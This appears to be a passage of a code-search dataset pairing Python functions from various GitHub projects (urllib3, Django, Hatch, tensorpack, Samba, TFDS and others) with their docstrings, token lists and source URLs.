[ "Return", "the", "marginal", "word", "distribution", "p", "(", "w", ")", "(", "term", "proportions", "derived", "from", "topic", "model", ")", "given", "the", "topic", "-", "word", "distribution", "(", "phi", ")", "topic_word_distrib", "and", "the", "marginal", "topic", "distribution", "p", "(", "T", ")", "p_t", ".", "The", "latter", "can", "be", "calculated", "with", ":", "func", ":", "~tmtoolkit", ".", "topicmod", ".", "model_stats", ".", "marginal_topic_distrib", "." ]
def marginal_word_distrib(topic_word_distrib, p_t): """ Return the marginal word distribution ``p(w)`` (term proportions derived from topic model) given the topic-word distribution (phi) `topic_word_distrib` and the marginal topic distribution ``p(T)`` `p_t`. The latter can be calculated with :func:`~tmtoolkit.topicmod.model_stats.marginal_topic_distrib`. :param topic_word_distrib: topic-word distribution; shape KxM, where K is number of topics, M is vocabulary size :param p_t: marginal topic distribution; array of size K :return: array of size M (vocabulary size) with marginal word distribution """ return (topic_word_distrib.T * p_t).sum(axis=1)
[ "def", "marginal_word_distrib", "(", "topic_word_distrib", ",", "p_t", ")", ":", "return", "(", "topic_word_distrib", ".", "T", "*", "p_t", ")", ".", "sum", "(", "axis", "=", "1", ")" ]
https://github.com/WZBSocialScienceCenter/tmtoolkit/blob/ed9b1d4af572cf10eae37b9566e229e2dd487605/tmtoolkit/topicmod/model_stats.py#L29-L39
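The record above computes the mixture p(w) = sum_k p(w | t_k) * p(t_k). A small numeric check (assuming the function is in scope):

import numpy as np

phi = np.array([[0.5, 0.3, 0.2],   # K=2 topics over M=3 words; rows sum to 1
                [0.1, 0.1, 0.8]])
p_t = np.array([0.75, 0.25])       # marginal topic distribution

print(marginal_word_distrib(phi, p_t))  # [0.4 0.25 0.35], sums to 1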
benknight/hue-alfred-workflow
4447ba61116caf4a448b50c4bfb866565d66d81e
logic/packages/requests/packages/urllib3/request.py
python
RequestMethods.request_encode_url
(self, method, url, fields=None, **urlopen_kw)
return self.urlopen(method, url, **urlopen_kw)
Make a request using :meth:`urlopen` with the ``fields`` encoded in the url. This is useful for request methods like GET, HEAD, DELETE, etc.
Make a request using :meth:`urlopen` with the ``fields`` encoded in the url. This is useful for request methods like GET, HEAD, DELETE, etc.
[ "Make", "a", "request", "using", ":", "meth", ":", "urlopen", "with", "the", "fields", "encoded", "in", "the", "url", ".", "This", "is", "useful", "for", "request", "methods", "like", "GET", "HEAD", "DELETE", "etc", "." ]
def request_encode_url(self, method, url, fields=None, **urlopen_kw): """ Make a request using :meth:`urlopen` with the ``fields`` encoded in the url. This is useful for request methods like GET, HEAD, DELETE, etc. """ if fields: url += '?' + urlencode(fields) return self.urlopen(method, url, **urlopen_kw)
[ "def", "request_encode_url", "(", "self", ",", "method", ",", "url", ",", "fields", "=", "None", ",", "*", "*", "urlopen_kw", ")", ":", "if", "fields", ":", "url", "+=", "'?'", "+", "urlencode", "(", "fields", ")", "return", "self", ".", "urlopen", "(", "method", ",", "url", ",", "*", "*", "urlopen_kw", ")" ]
https://github.com/benknight/hue-alfred-workflow/blob/4447ba61116caf4a448b50c4bfb866565d66d81e/logic/packages/requests/packages/urllib3/request.py#L81-L88
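The body of `request_encode_url` is just `urlencode` plus a `'?'`; a standalone sketch of the URL it would hand to `urlopen` (modern Python spells the import `urllib.parse.urlencode`; the vendored Python 2 copy gets it from `urllib`):

    from urllib.parse import urlencode

    url = 'http://example.com/search'
    fields = {'q': 'hue lights', 'limit': 10}
    if fields:
        url += '?' + urlencode(fields)
    print(url)  # http://example.com/search?q=hue+lights&limit=10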
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_hxb2/lib/python3.5/site-packages/django/core/exceptions.py
python
ValidationError.message_dict
(self)
return dict(self)
[]
def message_dict(self): # Trigger an AttributeError if this ValidationError # doesn't have an error_dict. getattr(self, 'error_dict') return dict(self)
[ "def", "message_dict", "(", "self", ")", ":", "# Trigger an AttributeError if this ValidationError", "# doesn't have an error_dict.", "getattr", "(", "self", ",", "'error_dict'", ")", "return", "dict", "(", "self", ")" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_hxb2/lib/python3.5/site-packages/django/core/exceptions.py#L151-L156
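The `getattr(self, 'error_dict')` line is a guard: `message_dict` only makes sense for a `ValidationError` built from a dict of per-field errors, and the attribute access deliberately raises `AttributeError` otherwise. A short usage sketch (assumes Django is importable):

    from django.core.exceptions import ValidationError

    # Built from a dict, so error_dict exists and message_dict works:
    e = ValidationError({'email': ['Enter a valid email address.']})
    print(e.message_dict)  # {'email': ['Enter a valid email address.']}

    # Built from a plain message, there is no error_dict, so the getattr guard
    # surfaces an AttributeError instead of returning a misleading dict:
    try:
        ValidationError('Something went wrong.').message_dict
    except AttributeError:
        print('no per-field errors on this instance')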
ofek/hatch
ff67fb61056a5b682951c9d2f6e9ef935d6181f6
hatch/cli/publish/__init__.py
python
publish
(app, artifacts, user, auth, repo, no_prompt, publisher_name, options)
Publish build artifacts.
Publish build artifacts.
[ "Publish", "build", "artifacts", "." ]
def publish(app, artifacts, user, auth, repo, no_prompt, publisher_name, options): """Publish build artifacts.""" option_map = {'no_prompt': no_prompt} if publisher_name == 'pypi': if options: app.abort('Use the standard CLI flags rather than passing explicit options when using the `pypi` plugin') if user: option_map['user'] = user if auth: option_map['auth'] = auth if repo: option_map['repo'] = repo else: # no cov for option in options: key, _, value = option.partition('=') option_map[key] = value publisher_class = app.plugins.publisher.get(publisher_name) if publisher_class is None: app.abort(f'Unknown publisher: {publisher_name}') publisher = publisher_class( app.get_safe_application(), app.project.location, app.cache_dir / 'publish' / publisher_name, app.project.config.publish.get(publisher_name, {}), app.config.publish.get(publisher_name, {}), ) publisher.publish(list(artifacts), option_map)
[ "def", "publish", "(", "app", ",", "artifacts", ",", "user", ",", "auth", ",", "repo", ",", "no_prompt", ",", "publisher_name", ",", "options", ")", ":", "option_map", "=", "{", "'no_prompt'", ":", "no_prompt", "}", "if", "publisher_name", "==", "'pypi'", ":", "if", "options", ":", "app", ".", "abort", "(", "'Use the standard CLI flags rather than passing explicit options when using the `pypi` plugin'", ")", "if", "user", ":", "option_map", "[", "'user'", "]", "=", "user", "if", "auth", ":", "option_map", "[", "'auth'", "]", "=", "auth", "if", "repo", ":", "option_map", "[", "'repo'", "]", "=", "repo", "else", ":", "# no cov", "for", "option", "in", "options", ":", "key", ",", "_", ",", "value", "=", "option", ".", "partition", "(", "'='", ")", "option_map", "[", "key", "]", "=", "value", "publisher_class", "=", "app", ".", "plugins", ".", "publisher", ".", "get", "(", "publisher_name", ")", "if", "publisher_class", "is", "None", ":", "app", ".", "abort", "(", "f'Unknown publisher: {publisher_name}'", ")", "publisher", "=", "publisher_class", "(", "app", ".", "get_safe_application", "(", ")", ",", "app", ".", "project", ".", "location", ",", "app", ".", "cache_dir", "/", "'publish'", "/", "publisher_name", ",", "app", ".", "project", ".", "config", ".", "publish", ".", "get", "(", "publisher_name", ",", "{", "}", ")", ",", "app", ".", "config", ".", "publish", ".", "get", "(", "publisher_name", ",", "{", "}", ")", ",", ")", "publisher", ".", "publish", "(", "list", "(", "artifacts", ")", ",", "option_map", ")" ]
https://github.com/ofek/hatch/blob/ff67fb61056a5b682951c9d2f6e9ef935d6181f6/hatch/cli/publish/__init__.py#L44-L73
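In the non-`pypi` branch above, arbitrary publisher options arrive as `key=value` strings and are split with `str.partition`, which splits only at the first `=`, so values may themselves contain `=`. A standalone sketch with hypothetical options:

    options = ('repo=https://upload.example/simple?auth=token', 'user=alice', 'dry-run')

    option_map = {}
    for option in options:
        key, _, value = option.partition('=')  # only the first '=' splits
        option_map[key] = value

    print(option_map)
    # {'repo': 'https://upload.example/simple?auth=token', 'user': 'alice', 'dry-run': ''}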
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/philips_js/media_player.py
python
PhilipsTVMediaPlayer.media_title
(self)
return self._media_title
Title of current playing media.
Title of current playing media.
[ "Title", "of", "current", "playing", "media", "." ]
def media_title(self): """Title of current playing media.""" return self._media_title
[ "def", "media_title", "(", "self", ")", ":", "return", "self", ".", "_media_title" ]
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/philips_js/media_player.py#L246-L248
nadineproject/nadine
c41c8ef7ffe18f1853029c97eecc329039b4af6c
doors/keymaster/models.py
python
Keymaster.unresolved_logs
(self)
return self.gatekeeperlog_set.filter(keymaster=self, resolved=False)
[]
def unresolved_logs(self): return self.gatekeeperlog_set.filter(keymaster=self, resolved=False)
[ "def", "unresolved_logs", "(", "self", ")", ":", "return", "self", ".", "gatekeeperlog_set", ".", "filter", "(", "keymaster", "=", "self", ",", "resolved", "=", "False", ")" ]
https://github.com/nadineproject/nadine/blob/c41c8ef7ffe18f1853029c97eecc329039b4af6c/doors/keymaster/models.py#L141-L142
wanggrun/Adaptively-Connected-Neural-Networks
e27066ef52301bdafa5932f43af8feeb23647edb
tensorpack-installed/build/lib/tensorpack/dataflow/common.py
python
MapDataComponent.__init__
(self, ds, func, index=0)
Args: ds (DataFlow): input DataFlow. func (TYPE -> TYPE|None): takes ``dp[index]``, returns a new value for ``dp[index]``. Return None to discard this datapoint. index (int): index of the component.
Args: ds (DataFlow): input DataFlow. func (TYPE -> TYPE|None): takes ``dp[index]``, returns a new value for ``dp[index]``. Return None to discard this datapoint. index (int): index of the component.
[ "Args", ":", "ds", "(", "DataFlow", ")", ":", "input", "DataFlow", ".", "func", "(", "TYPE", "-", ">", "TYPE|None", ")", ":", "takes", "dp", "[", "index", "]", "returns", "a", "new", "value", "for", "dp", "[", "index", "]", ".", "Return", "None", "to", "discard", "this", "datapoint", ".", "index", "(", "int", ")", ":", "index", "of", "the", "component", "." ]
def __init__(self, ds, func, index=0): """ Args: ds (DataFlow): input DataFlow. func (TYPE -> TYPE|None): takes ``dp[index]``, returns a new value for ``dp[index]``. Return None to discard this datapoint. index (int): index of the component. """ index = int(index) def f(dp): r = func(dp[index]) if r is None: return None dp = list(dp) # shallow copy to avoid modifying the list dp[index] = r return dp super(MapDataComponent, self).__init__(ds, f)
[ "def", "__init__", "(", "self", ",", "ds", ",", "func", ",", "index", "=", "0", ")", ":", "index", "=", "int", "(", "index", ")", "def", "f", "(", "dp", ")", ":", "r", "=", "func", "(", "dp", "[", "index", "]", ")", "if", "r", "is", "None", ":", "return", "None", "dp", "=", "list", "(", "dp", ")", "# shallow copy to avoid modifying the list", "dp", "[", "index", "]", "=", "r", "return", "dp", "super", "(", "MapDataComponent", ",", "self", ")", ".", "__init__", "(", "ds", ",", "f", ")" ]
https://github.com/wanggrun/Adaptively-Connected-Neural-Networks/blob/e27066ef52301bdafa5932f43af8feeb23647edb/tensorpack-installed/build/lib/tensorpack/dataflow/common.py#L290-L307
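The shallow copy inside `f` is the load-bearing detail: without `list(dp)`, rewriting `dp[index]` would mutate a datapoint that other consumers may still hold. A minimal standalone version of the wrapper (no tensorpack needed):

    def make_component_mapper(func, index=0):
        # same shape as the `f` built inside MapDataComponent.__init__
        def f(dp):
            r = func(dp[index])
            if r is None:      # None means: drop this datapoint entirely
                return None
            dp = list(dp)      # shallow copy so the caller's list is untouched
            dp[index] = r
            return dp
        return f

    double_label = make_component_mapper(lambda x: x * 2, index=1)
    dp = ['image.png', 3]
    print(double_label(dp))  # ['image.png', 6]
    print(dp)                # ['image.png', 3] -- original unchanged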
tensorpack/tensorpack
fac024f0f72fd593ea243f0b599a51b11fe4effd
tensorpack/tfutils/tower.py
python
TowerContext
(tower_name, is_training, vs_name='')
The context for a tower function, containing metadata about the current tower. Tensorpack trainers use :class:`TowerContext` to manage tower function. Many tensorpack layers have to be called under a :class:`TowerContext`. Example: .. code-block:: python with TowerContext('', is_training=True): # call a tensorpack layer or a tower function
The context for a tower function, containing metadata about the current tower. Tensorpack trainers use :class:`TowerContext` to manage tower function. Many tensorpack layers have to be called under a :class:`TowerContext`.
[ "The", "context", "for", "a", "tower", "function", "containing", "metadata", "about", "the", "current", "tower", ".", "Tensorpack", "trainers", "use", ":", "class", ":", "TowerContext", "to", "manage", "tower", "function", ".", "Many", "tensorpack", "layers", "have", "to", "be", "called", "under", "a", ":", "class", ":", "TowerContext", "." ]
def TowerContext(tower_name, is_training, vs_name=''): """ The context for a tower function, containing metadata about the current tower. Tensorpack trainers use :class:`TowerContext` to manage tower function. Many tensorpack layers have to be called under a :class:`TowerContext`. Example: .. code-block:: python with TowerContext('', is_training=True): # call a tensorpack layer or a tower function """ if is_training: return TrainTowerContext(tower_name, vs_name=vs_name) else: return PredictTowerContext(tower_name, vs_name=vs_name)
[ "def", "TowerContext", "(", "tower_name", ",", "is_training", ",", "vs_name", "=", "''", ")", ":", "if", "is_training", ":", "return", "TrainTowerContext", "(", "tower_name", ",", "vs_name", "=", "vs_name", ")", "else", ":", "return", "PredictTowerContext", "(", "tower_name", ",", "vs_name", "=", "vs_name", ")" ]
https://github.com/tensorpack/tensorpack/blob/fac024f0f72fd593ea243f0b599a51b11fe4effd/tensorpack/tfutils/tower.py#L232-L248
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/google/appengine/api/datastore.py
python
_PushConnection
(new_connection)
Internal method that saves the current connection and sets a new one. Args: new_connection: The connection to set.
Internal method that saves the current connection and sets a new one.
[ "Internal", "method", "that", "saves", "the", "current", "connection", "and", "sets", "a", "new", "one", "." ]
def _PushConnection(new_connection): """Internal method that saves the current connection and sets a new one. Args: new_connection: The connection to set. """ __InitConnection() _thread_local.connection_stack.append(new_connection)
[ "def", "_PushConnection", "(", "new_connection", ")", ":", "__InitConnection", "(", ")", "_thread_local", ".", "connection_stack", ".", "append", "(", "new_connection", ")" ]
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/google/appengine/api/datastore.py#L400-L407
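`__InitConnection` and `_thread_local` are module internals not shown in this record, but the pattern is a `threading.local` holding a per-thread stack, so pushes on one thread never disturb another. A rough self-contained sketch:

    import threading

    _thread_local = threading.local()

    def _init_connection():
        # stand-in for the module's __InitConnection(): ensure this thread
        # has its own stack before first use
        if not hasattr(_thread_local, 'connection_stack'):
            _thread_local.connection_stack = []

    def push_connection(new_connection):
        _init_connection()
        _thread_local.connection_stack.append(new_connection)

    def pop_connection():
        _init_connection()
        return _thread_local.connection_stack.pop()

    push_connection('conn-A')
    push_connection('conn-B')
    print(pop_connection())  # conn-B -- LIFO, so conn-A becomes current again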
wxWidgets/Phoenix
b2199e299a6ca6d866aa6f3d0888499136ead9d6
wx/lib/agw/gradientbutton.py
python
GradientButton.OnMouseEnter
(self, event)
Handles the ``wx.EVT_ENTER_WINDOW`` event for :class:`GradientButton`. :param `event`: a :class:`MouseEvent` event to be processed.
Handles the ``wx.EVT_ENTER_WINDOW`` event for :class:`GradientButton`.
[ "Handles", "the", "wx", ".", "EVT_ENTER_WINDOW", "event", "for", ":", "class", ":", "GradientButton", "." ]
def OnMouseEnter(self, event): """ Handles the ``wx.EVT_ENTER_WINDOW`` event for :class:`GradientButton`. :param `event`: a :class:`MouseEvent` event to be processed. """ if not self.IsEnabled(): return self._mouseAction = HOVER self.Refresh() event.Skip()
[ "def", "OnMouseEnter", "(", "self", ",", "event", ")", ":", "if", "not", "self", ".", "IsEnabled", "(", ")", ":", "return", "self", ".", "_mouseAction", "=", "HOVER", "self", ".", "Refresh", "(", ")", "event", ".", "Skip", "(", ")" ]
https://github.com/wxWidgets/Phoenix/blob/b2199e299a6ca6d866aa6f3d0888499136ead9d6/wx/lib/agw/gradientbutton.py#L319-L331
HazyResearch/pdftotree
0686a1845c7901aa975544a9107fc10594523986
pdftotree/utils/pdf/render.py
python
Renderer.is_mention
(cell_val)
return cell_val >= 0
Nonnegative values in grid cells are reserved for mention ids
Nonnegative values in grid cells are reserved for mention ids
[ "Nonnegative", "values", "in", "grid", "cells", "are", "reserved", "for", "mention", "ids" ]
def is_mention(cell_val): """ Nonnegative values in grid cells are reserved for mention ids """ return cell_val >= 0
[ "def", "is_mention", "(", "cell_val", ")", ":", "return", "cell_val", ">=", "0" ]
https://github.com/HazyResearch/pdftotree/blob/0686a1845c7901aa975544a9107fc10594523986/pdftotree/utils/pdf/render.py#L71-L75
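Since the grid encodes mention ids as nonnegative integers (negative values act as non-mention sentinels), the `is_mention` test also vectorizes cleanly over a whole grid; a tiny illustration with made-up values:

    import numpy as np

    grid = np.array([[-1, 3],
                     [ 0, -2]])   # hypothetical grid; -1/-2 are non-mention markers
    mention_mask = grid >= 0      # is_mention, applied elementwise
    print(grid[mention_mask])     # [3 0] -- the mention ids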
byt3bl33d3r/pth-toolkit
3641cdc76c0f52275315c9b18bf08b22521bd4d7
lib/python2.7/site-packages/samba/samba3/__init__.py
python
Registry.subkeys
(self, key)
return keys
Retrieve the subkeys for the specified key. :param key: Key path. :return: list with key names
Retrieve the subkeys for the specified key.
[ "Retrieve", "the", "subkeys", "for", "the", "specified", "key", "." ]
def subkeys(self, key): """Retrieve the subkeys for the specified key. :param key: Key path. :return: list with key names """ data = self.tdb.get("%s\x00" % key) if data is None: return [] (num, ) = struct.unpack("<L", data[0:4]) keys = data[4:].split("\0") assert keys[-1] == "" keys.pop() assert len(keys) == num return keys
[ "def", "subkeys", "(", "self", ",", "key", ")", ":", "data", "=", "self", ".", "tdb", ".", "get", "(", "\"%s\\x00\"", "%", "key", ")", "if", "data", "is", "None", ":", "return", "[", "]", "(", "num", ",", ")", "=", "struct", ".", "unpack", "(", "\"<L\"", ",", "data", "[", "0", ":", "4", "]", ")", "keys", "=", "data", "[", "4", ":", "]", ".", "split", "(", "\"\\0\"", ")", "assert", "keys", "[", "-", "1", "]", "==", "\"\"", "keys", ".", "pop", "(", ")", "assert", "len", "(", "keys", ")", "==", "num", "return", "keys" ]
https://github.com/byt3bl33d3r/pth-toolkit/blob/3641cdc76c0f52275315c9b18bf08b22521bd4d7/lib/python2.7/site-packages/samba/samba3/__init__.py#L85-L99
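`subkeys` decodes a small binary layout: a 4-byte little-endian count followed by NUL-terminated key names. The original module is Python 2 (it slices `str`); a Python 3 round-trip of the same layout using `bytes`:

    import struct

    names = [b"HKLM\\SOFTWARE\\Samba", b"HKLM\\SYSTEM"]
    # layout: 4-byte little-endian count, then each key name NUL-terminated
    data = struct.pack("<L", len(names)) + b"".join(n + b"\0" for n in names)

    # decode it the way subkeys() does
    (num,) = struct.unpack("<L", data[0:4])
    keys = data[4:].split(b"\0")
    assert keys[-1] == b""  # the trailing NUL leaves one empty trailing element
    keys.pop()
    assert len(keys) == num
    print(keys)  # [b'HKLM\\SOFTWARE\\Samba', b'HKLM\\SYSTEM']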
tensorflow/datasets
2e496976d7d45550508395fb2f35cf958c8a3414
tensorflow_datasets/core/utils/py_utils.py
python
basename_from_url
(url: str)
return filename or 'unknown_name'
Returns the file name of the file at the given URL.
Returns the file name of the file at the given URL.
[ "Returns", "the", "file", "name", "of", "the", "file", "at", "the", "given", "URL", "." ]
def basename_from_url(url: str) -> str: """Returns the file name of the file at the given URL.""" filename = urllib.parse.urlparse(url).path filename = os.path.basename(filename) # Replace `%2F` (html code for `/`) by `_`. # This is consistent with how Chrome renames downloaded files. filename = filename.replace('%2F', '_') return filename or 'unknown_name'
[ "def", "basename_from_url", "(", "url", ":", "str", ")", "->", "str", ":", "filename", "=", "urllib", ".", "parse", ".", "urlparse", "(", "url", ")", ".", "path", "filename", "=", "os", ".", "path", ".", "basename", "(", "filename", ")", "# Replace `%2F` (html code for `/`) by `_`.", "# This is consistent with how Chrome renames downloaded files.", "filename", "=", "filename", ".", "replace", "(", "'%2F'", ",", "'_'", ")", "return", "filename", "or", "'unknown_name'" ]
https://github.com/tensorflow/datasets/blob/2e496976d7d45550508395fb2f35cf958c8a3414/tensorflow_datasets/core/utils/py_utils.py#L469-L476
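A few hypothetical URLs run through the same three steps (path extraction, basename, `%2F` replacement) show why each step is there:

    import os
    from urllib.parse import urlparse

    def demo(url):
        filename = os.path.basename(urlparse(url).path)
        return filename.replace('%2F', '_') or 'unknown_name'

    print(demo('https://example.com/data/train.csv?v=2'))  # train.csv (query ignored)
    print(demo('https://example.com/dl/dir%2Ffile.zip'))   # dir_file.zip
    print(demo('https://example.com/'))                    # unknown_name (empty basename)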
numenta/numenta-apps
02903b0062c89c2c259b533eea2df6e8bb44eaf3
nta.utils/nta/utils/message_bus_connector.py
python
MessageBusConnector.consume
(self, mqName, blocking=True)
return consumer
Create an instance of _QueueConsumer iterable for consuming messages. The iterable yields an instance of _ConsumedMessage. mqName: name of the existing source message queue blocking: if True, the iterable will block until another message becomes available; if False, the iterable will terminate iteration when no more messages are available in the queue. [Defaults to blocking=True] The iterable raises: MessageQueueNotFound Blocking iterable example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: for msg in consumer: processMessageBody(msg.body) msg.ack() Polling example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: msg = consumer.pollOneMessage() if msg is not None: processMessageBody(msg.body) msg.ack()
Create an instance of _QueueConsumer iterable for consuming messages. The iterable yields an instance of _ConsumedMessage.
[ "Create", "an", "instance", "of", "_QueueConsumer", "iterable", "for", "consuming", "messages", ".", "The", "iterable", "yields", "an", "instance", "of", "_ConsumedMessage", "." ]
def consume(self, mqName, blocking=True): """ Create an instance of _QueueConsumer iterable for consuming messages. The iterable yields an instance of _ConsumedMessage. mqName: name of the existing source message queue blocking: if True, the iterable will block until another message becomes available; if False, the iterable will terminate iteration when no more messages are available in the queue. [Defaults to blocking=True] The iterable raises: MessageQueueNotFound Blocking iterable example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: for msg in consumer: processMessageBody(msg.body) msg.ack() Polling example: with MessageBusConnector() as bus: with bus.consume("myqueue") as consumer: msg = consumer.pollOneMessage() if msg is not None: processMessageBody(msg.body) msg.ack() """ consumer = _QueueConsumer( mqName=mqName, blocking=blocking, prefetchMax=self._PREFETCH_MAX, bus=self) self._consumers.append(consumer) return consumer
[ "def", "consume", "(", "self", ",", "mqName", ",", "blocking", "=", "True", ")", ":", "consumer", "=", "_QueueConsumer", "(", "mqName", "=", "mqName", ",", "blocking", "=", "blocking", ",", "prefetchMax", "=", "self", ".", "_PREFETCH_MAX", ",", "bus", "=", "self", ")", "self", ".", "_consumers", ".", "append", "(", "consumer", ")", "return", "consumer" ]
https://github.com/numenta/numenta-apps/blob/02903b0062c89c2c259b533eea2df6e8bb44eaf3/nta.utils/nta/utils/message_bus_connector.py#L369-L403
DataDog/integrations-core
934674b29d94b70ccc008f76ea172d0cdae05e1e
scylla/datadog_checks/scylla/config_models/defaults.py
python
instance_tls_verify
(field, value)
return True
[]
def instance_tls_verify(field, value): return True
[ "def", "instance_tls_verify", "(", "field", ",", "value", ")", ":", "return", "True" ]
https://github.com/DataDog/integrations-core/blob/934674b29d94b70ccc008f76ea172d0cdae05e1e/scylla/datadog_checks/scylla/config_models/defaults.py#L253-L254
krintoxi/NoobSec-Toolkit
38738541cbc03cedb9a3b3ed13b629f781ad64f6
NoobSecToolkit /tools/inject/plugins/dbms/maxdb/filesystem.py
python
Filesystem.__init__
(self)
[]
def __init__(self): GenericFilesystem.__init__(self)
[ "def", "__init__", "(", "self", ")", ":", "GenericFilesystem", ".", "__init__", "(", "self", ")" ]
https://github.com/krintoxi/NoobSec-Toolkit/blob/38738541cbc03cedb9a3b3ed13b629f781ad64f6/NoobSecToolkit /tools/inject/plugins/dbms/maxdb/filesystem.py#L12-L13
fonttools/fonttools
892322aaff6a89bea5927379ec06bc0da3dfb7df
Lib/fontTools/otlLib/builder.py
python
ChainContextualBuilder.buildFormat3Subtable
(self, rule, chaining=True)
return st
[]
def buildFormat3Subtable(self, rule, chaining=True): st = self.newSubtable_(chaining=chaining) st.Format = 3 if chaining: self.setBacktrackCoverage_(rule.prefix, st) self.setLookAheadCoverage_(rule.suffix, st) self.setInputCoverage_(rule.glyphs, st) else: self.setCoverage_(rule.glyphs, st) self.buildLookupList(rule, st) return st
[ "def", "buildFormat3Subtable", "(", "self", ",", "rule", ",", "chaining", "=", "True", ")", ":", "st", "=", "self", ".", "newSubtable_", "(", "chaining", "=", "chaining", ")", "st", ".", "Format", "=", "3", "if", "chaining", ":", "self", ".", "setBacktrackCoverage_", "(", "rule", ".", "prefix", ",", "st", ")", "self", ".", "setLookAheadCoverage_", "(", "rule", ".", "suffix", ",", "st", ")", "self", ".", "setInputCoverage_", "(", "rule", ".", "glyphs", ",", "st", ")", "else", ":", "self", ".", "setCoverage_", "(", "rule", ".", "glyphs", ",", "st", ")", "self", ".", "buildLookupList", "(", "rule", ",", "st", ")", "return", "st" ]
https://github.com/fonttools/fonttools/blob/892322aaff6a89bea5927379ec06bc0da3dfb7df/Lib/fontTools/otlLib/builder.py#L531-L541
rootpy/rootpy
3926935e1f2100d8ba68070c2ab44055d4800f73
rootpy/extern/pyparsing.py
python
nullDebugAction
(*args)
'Do-nothing' debug action, to suppress debugging output during parsing.
'Do-nothing' debug action, to suppress debugging output during parsing.
[ "Do", "-", "nothing", "debug", "action", "to", "suppress", "debugging", "output", "during", "parsing", "." ]
def nullDebugAction(*args): """'Do-nothing' debug action, to suppress debugging output during parsing.""" pass
[ "def", "nullDebugAction", "(", "*", "args", ")", ":", "pass" ]
https://github.com/rootpy/rootpy/blob/3926935e1f2100d8ba68070c2ab44055d4800f73/rootpy/extern/pyparsing.py#L744-L746
oilshell/oil
94388e7d44a9ad879b12615f6203b38596b5a2d3
core/state.py
python
_ArgFrame.GetNumArgs
(self)
return len(self.argv) - self.num_shifted
[]
def GetNumArgs(self): # type: () -> int return len(self.argv) - self.num_shifted
[ "def", "GetNumArgs", "(", "self", ")", ":", "# type: () -> int", "return", "len", "(", "self", ".", "argv", ")", "-", "self", ".", "num_shifted" ]
https://github.com/oilshell/oil/blob/94388e7d44a9ad879b12615f6203b38596b5a2d3/core/state.py#L627-L629
zatosource/zato
2a9d273f06f9d776fbfeb53e73855af6e40fa208
code/zato-server/src/zato/server/connection/connector/subprocess_/base.py
python
BaseConnectionContainer._create_outconn
(self, msg)
return Response()
A low-level method to create an outgoing connection. Must be called with self.lock held.
A low-level method to create an outgoing connection. Must be called with self.lock held.
[ "A", "low", "-", "level", "method", "to", "create", "an", "outgoing", "connection", ".", "Must", "be", "called", "with", "self", ".", "lock", "held", "." ]
def _create_outconn(self, msg): """ A low-level method to create an outgoing connection. Must be called with self.lock held. """ # Not all outgoing connections have their parent definitions def_id = msg.get('def_id') if def_id: # Just to be on the safe side, make sure that our connection exists if not msg.def_id in self.connections: return Response(_http_503, 'Could not find def_id among {}'.format(self.connections.keys()), 'text/plain') # Map outconn to its definition self.outconn_id_to_def_id[msg.id] = msg.def_id # Create the outconn now self.outconns[msg.id] = msg # Maps outconn name to its ID self.outconn_name_to_id[msg.name] = msg.id self.logger.info('Added connection `%s`, self.outconns -> `%s`', msg.name, self.outconns) # Everything OK return Response()
[ "def", "_create_outconn", "(", "self", ",", "msg", ")", ":", "# Not all outgoing connections have their parent definitions", "def_id", "=", "msg", ".", "get", "(", "'def_id'", ")", "if", "def_id", ":", "# Just to be on the safe side, make sure that our connection exists", "if", "not", "msg", ".", "def_id", "in", "self", ".", "connections", ":", "return", "Response", "(", "_http_503", ",", "'Could not find def_id among {}'", ".", "format", "(", "self", ".", "connections", ".", "keys", "(", ")", ")", ",", "'text/plain'", ")", "# Map outconn to its definition", "self", ".", "outconn_id_to_def_id", "[", "msg", ".", "id", "]", "=", "msg", ".", "def_id", "# Create the outconn now", "self", ".", "outconns", "[", "msg", ".", "id", "]", "=", "msg", "# Maps outconn name to its ID", "self", ".", "outconn_name_to_id", "[", "msg", ".", "name", "]", "=", "msg", ".", "id", "self", ".", "logger", ".", "info", "(", "'Added connection `%s`, self.outconns -> `%s`'", ",", "msg", ".", "name", ",", "self", ".", "outconns", ")", "# Everything OK", "return", "Response", "(", ")" ]
https://github.com/zatosource/zato/blob/2a9d273f06f9d776fbfeb53e73855af6e40fa208/code/zato-server/src/zato/server/connection/connector/subprocess_/base.py#L368-L392
nanoporetech/medaka
2b83074fe3b6a6ec971614bfc6804f543fe1e5f0
medaka/features.py
python
FeatureEncoderRegistrar.__new__
(cls, clsname, bases, attrs)
return newclass
Register class to `feature_encoders` dict upon instantiation.
Register class to `feature_encoders` dict upon instantiation.
[ "Register", "class", "to", "feature_encoders", "dict", "upon", "instantiation", "." ]
def __new__(cls, clsname, bases, attrs): """Register class to `feature_encoders` dict upon instantiation.""" newclass = super(FeatureEncoderRegistrar, cls).__new__( cls, clsname, bases, attrs) cls.register_feature_encoder(clsname, newclass) return newclass
[ "def", "__new__", "(", "cls", ",", "clsname", ",", "bases", ",", "attrs", ")", ":", "newclass", "=", "super", "(", "FeatureEncoderRegistrar", ",", "cls", ")", ".", "__new__", "(", "cls", ",", "clsname", ",", "bases", ",", "attrs", ")", "cls", ".", "register_feature_encoder", "(", "clsname", ",", "newclass", ")", "return", "newclass" ]
https://github.com/nanoporetech/medaka/blob/2b83074fe3b6a6ec971614bfc6804f543fe1e5f0/medaka/features.py#L297-L302
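`register_feature_encoder` and the `feature_encoders` dict are medaka internals not shown in this record; the mechanics are the standard metaclass-registry pattern, where merely *defining* a subclass records it. A minimal self-contained sketch:

    registry = {}

    class Registrar(type):
        def __new__(cls, clsname, bases, attrs):
            newclass = super().__new__(cls, clsname, bases, attrs)
            registry[clsname] = newclass  # runs at class-definition time
            return newclass

    class BaseEncoder(metaclass=Registrar):
        pass

    class CountsEncoder(BaseEncoder):  # defining the subclass registers it
        pass

    print(sorted(registry))  # ['BaseEncoder', 'CountsEncoder']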
Yelp/paasta
6c08c04a577359509575c794b973ea84d72accf9
paasta_tools/utils.py
python
SystemPaastaConfig.get_cluster
(self)
